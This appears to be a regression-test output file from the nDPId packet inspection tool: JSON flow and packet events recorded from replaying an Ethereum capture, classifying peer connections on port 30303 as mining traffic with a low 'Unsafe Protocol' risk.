00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1578508365189,"flow_last_seen":1578508365942,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":2209,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365846,"flow_last_seen":1578508366076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1268,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1578508365741,"flow_last_seen":1578508366031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":1803,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508364832,"flow_last_seen":1578508365305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":413,"flow_tot_l4_payload_len":1122,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
